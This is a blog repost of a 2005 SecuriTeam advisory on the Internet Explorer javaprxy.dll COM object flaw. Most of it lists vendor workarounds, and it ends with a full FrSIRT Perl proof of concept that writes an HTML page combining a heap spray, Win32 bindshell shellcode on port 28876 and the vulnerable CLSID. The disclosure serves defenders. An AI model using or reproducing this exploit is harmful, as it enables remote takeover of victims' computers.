Search This Blog

Tuesday, July 05, 2005

[NT] Microsoft Internet Explorer Javaprxy.dll COM Object Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Microsoft Internet Explorer Javaprxy.dll COM Object Execution
------------------------------------------------------------------------

SUMMARY

Internet Explorer allows users to utilize Windows's COM Objects. A
vulnerability with javaprxy.dll allows attackers to craft a special HTML
code that will cause Internet Explorer to execute a remote command by
using one of Windows's COM Objects.

DETAILS

Vulnerable Systems:
* Internet Explorer 5.01 Service Pack 3
* Internet Explorer 5.01 Service Pack 4
* Internet Explorer 6 Service Pack 1
* Internet Explorer 6
* Internet Explorer 5.5 Service Pack 2

A vulnerability was identified in Microsoft Internet Explorer, which could
be exploited by remote attackers to execute arbitrary commands. This flaw
is due to an error in the "javaprxy.dll" COM Object when instantiated in
Internet Explorer via a specially crafted HTML tag, which could be
exploited via a malicious Web page to compromise and take complete control
of a vulnerable system.

Workarounds:
Set Internet and Local intranet security zone settings to High to prompt
before running ActiveX controls in these zones
You can help protect against this vulnerability by changing your settings
for the Internet security zone to prompt before running ActiveX controls.
You can do this by setting your browser security to High.

To raise the browsing security level in Microsoft Internet Explorer,
follow these steps:
1. On the Internet Explorer Tools menu, click Internet Options.
2. In the Internet Options dialog box, click the Security tab, and then
click the Internet icon.
3. Under Security level for this zone, move the slider to High. This sets
the security level for all Web sites you visit to High.

Note If no slider is visible, click Default Level, and then move the
slider to High.

Note Setting the level to High may cause some Web sites to work
incorrectly. If you have difficulty using a Web site after you change this
setting, and you are sure the site is safe to use, you can add that site
to your list of trusted sites. This will allow the site to work correctly
even with the security setting set to High.

Impact of Workaround:
There are side effects to prompting before running ActiveX controls. Many
Web sites that are on the Internet or on an intranet use ActiveX to
provide additional functionality. For example, an online e-commerce site
or banking site may use ActiveX controls to provide menus, ordering forms,
or even account statements. Prompting before running ActiveX controls is a
global setting that affects all Internet and intranet sites. You will be
prompted frequently when you enable this workaround. For each prompt, if
you feel you trust the site that you are visiting, click Yes to run
ActiveX controls. If you do not want to be prompted for all these sites,
use the "Restrict Web sites to only your trusted Web sites" workaround.

Change your Internet Explorer to prompt before running or disable ActiveX
controls in the Internet and Local intranet security zone
You can help protect against this vulnerability by changing your settings
to prompt before running ActiveX controls. To do this, follow these steps:

1. In Internet Explorer, click Internet Options on the Tools menu.
2. Click the Security tab.
3. Click Internet, and then click Custom Level.
4. Under Settings, in the ActiveX controls and plug-ins section, under
Run ActiveX controls and plug-ins, click Prompt or Disable, and then click
OK.
5. Click Local intranet, and then click Custom Level.
6. Under Settings, in the ActiveX controls and plug-ins section, under
Run ActiveX controls and plug-ins, click Prompt or Disable, and then click
OK.
7. Click OK two times to return to Internet Explorer.

Impact of Workaround:
There are side effects to prompting before running ActiveX controls. Many
Web sites that are on the Internet or on an intranet use ActiveX to
provide additional functionality. For example, an online e-commerce site
or banking site may use ActiveX controls to provide menus, ordering forms,
or even account statements. Prompting before running ActiveX controls is a
global setting that affects all Internet and intranet sites. You will be
prompted frequently when you enable this workaround. For each prompt, if
you feel you trust the site that you are visiting, click Yes to run
ActiveX controls. If you do not want to be prompted for all these sites,
use the "Restrict Web sites to only your trusted Web sites" workaround.

Unregister the Javaprxy.dll COM Object
To unregister Javaprxy.dll, follow these steps:
1. Click Start, click Run, type "regsvr32 /u javaprxy.dll" (without the
quotation marks), and then click OK.
2. A dialog box appears to confirm that the unregistration process has
succeeded. Click OK to close the dialog box.
3. Close Internet Explorer, and reopen it for the changes to take effect.

Impact of Workaround:Applications that require the Microsoft Java Virtual
Machine may no longer function correctly.

Modify the Access Control List on Javaprxy.dll to be more restrictive
To modify the Access Control List (ACL) on Javaprxy.dll to be more
restrictive, follow these steps:
1. Click Start, click Run, type "cmd" (without the quotation marks), and
then click OK.
2. Type the following command at a command prompt. Make a note of the
current ACL s that are on the file (including inheritance settings) for
future reference in case you have to undo this modification:

cacls %windir%\system32\javaprxy.dll

3.Type the following command at a command prompt to deny the everyone
group access to this file:

cacls %windir%\system32\javaprxy.dll /d everyone

4. Close Internet Explorer, and reopen it for the changes to take effect.

Impact of Workaround:
Applications that require the Microsoft Java Virtual Machine may no longer
function correctly.

Disable the Javaprxy.dll COM object from running in Internet Explorer
Disable attempts to instantiate the Javaprxy.dll control in Internet
Explorer by setting the kill bit for the control.

Warning If you use Registry Editor incorrectly, you may cause serious
problems that may require you to reinstall your operating system.
Microsoft cannot guarantee that you can solve problems that result from
using Registry Editor incorrectly. Use Registry Editor at your own risk.

The CLSID for the Javaprxy.dll control is
03D9F3F2-B0E3-11D2-B081-006008039BF0

For detailed steps about stopping a control from running in Internet
Explorer, see <http://support.microsoft.com/kb/240797> Microsoft
Knowledge Base Article 240797. Follow these steps and create a
Compatibility Flags value in the registry to prevent the Javaprxy.dll
control from being instantiated in Internet Explorer.

Restrict access to Javaprxy.dll in Internet Explorer by using a Software
Restriction Policy
To restrict access to Javaprxy.dll in Internet Explorer on Windows XP and
later versions you can create a Software Restriction Policy. To create
this policy, use a registry script or create a Group Policy setting to
block the loading of the Javaprxy.dll.

Note Using Registry Editor incorrectly can cause serious problems that may
require you to reinstall your operating system. Microsoft cannot guarantee
that problems resulting from the incorrect use of Registry Editor can be
solved. Use Registry Editor at your own risk. For information about how to
edit the registry, view the "Changing Keys And Values" Help topic in
Registry Editor (Regedit.exe) or view the "Add and Delete Information in
the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.

We recommend that you back up the registry before you edit it.

Use the following .reg file to un-register Javaprxy.dll in Internet
Explorer. You can copy the following text, paste it into a text editor
such as Notepad, and then save the file with the .reg file name extension.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\
CodeIdentifiers]
"TransparentEnabled"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\
CodeIdentifiers\0\Paths\{09687f8a-0ca9-4639-b295-a3f5b5be8fc5}]
"LastModified"=hex(b):50,09,1f,b1,04,4a,c5,01
"Description"="Block javaprxy.dll"
"SaferFlags"=dword:00000000
"ItemData"=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6a,00,61,00,76,00,61,00,70,00,72,00,78,00,79,00,2e,00,64,00,6c,00,6c,00,00,00

Impact of Workaround:
Applications that require the Microsoft Java Virtual Machine may no longer
function correctly.

Remove the Microsoft Java Virtual Machine from your system using the Java
Removal Tool
Customers can use the MSJVM
<http://www.microsoft.com/downloads/details.aspx?familyid=4e38f4f9-ce7e-4271-8836-a7d7293a992f> Diagnostic Tool available from the <http://www.microsoft.com/mscorp/java/> Microsoft Java Virtual Machine Support page to perform remote and local scans to detect for the presence of MSJVM and MSJVM-related software.

Customers can then use the Java Removal Tool to permanently remove the
Microsoft Java Virtual Machine from their system. For more information
about how to qualify for access to the Java Removal Tool from Microsoft
Product Support Services, see <http://support.microsoft.com/kb/826878>
Microsoft Knowledge Base Article 826878.

Warning: Removing the Microsoft Java Virtual Machine from your system is
permanent. Microsoft cannot provide Windows operating system recovery
media to you that includes the MSJVM for reinstallation. Microsoft no
longer includes the MSJVM in Windows operating system products.

Impact of Workaround: Applications that require the Microsoft Java Virtual
Machine will no longer function correctly.

Vendor Status:
The vendor has issued a patch for the vulnerability.

Exploit:
#!/usr/bin/perl
###########################
#
# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit
-Unpatched-
#
# Proof of Concept by the FrSIRT < http://www.frsirt.com / team at
frsirt.com >
# Bindshell on port 28876
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds -
http://www.microsoft.com/technet/security/advisory/903144.mspx
# Sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3
# Internet Explorer 5.01 Service Pack 4
# Internet Explorer 6 Service Pack 1
# Internet Explorer 6 Service Pack 1
# Internet Explorer 6 Service Pack 1
# Internet Explorer 6
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1
(Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based
Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for
Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003
(Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium
Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium
Edition
#
# Usage : perl iejavaprxyexploit.pl > mypage.html
#
###########################

# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";

# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < http://www.frsirt.com >\n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".
"</body><script>location.reload();</script></html>";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

#EOF

ADDITIONAL INFORMATION

The information has been provided by <mailto:team@frsirt.com> frsirt.
The original article can be found at:
<http://www.frsirt.com/english/advisories/2005/0935>
http://www.frsirt.com/english/advisories/2005/0935,
<http://www.sec-consult.com/184.html>
http://www.sec-consult.com/184.html.
The vendor advisory can be found at:
<http://www.microsoft.com/technet/security/advisory/903144.mspx>
http://www.microsoft.com/technet/security/advisory/903144.mspx

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)